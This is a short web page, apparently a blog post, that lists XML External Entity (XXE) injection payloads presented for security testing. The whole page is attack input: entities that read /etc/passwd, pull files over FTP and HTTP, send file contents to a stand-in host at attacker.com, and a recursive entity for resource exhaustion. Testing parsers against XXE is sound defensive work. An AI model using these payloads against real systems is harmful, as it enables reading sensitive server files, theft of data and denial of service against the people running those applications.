XXE | chs.us

Here are some common XXE payloads that can be used to test for XXE- Basic payload: <!DOCTYPE replace [<!ENTITY example "Hello World">]> Retrieving sensitive files: <!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd">]> Retrieving files via FTP: <!DOCTYPE replace [<!ENTITY example SYSTEM "ftp://username:password@ftp.example.com/file">]> Retrieving files via HTTP: <!DOCTYPE replace [<!ENTITY example SYSTEM "http://example.com/file">]> Sending data to a remote server: <!DOCTYPE replace [<!ENTITY example SYSTEM "http://attacker.com/?data=%file_contents;">]> Recursive payload: <!DOCTYPE replace [<!ENTITY example "Hello &example2;"><!ENTITY example2 "&example;&example;&example;">]> ...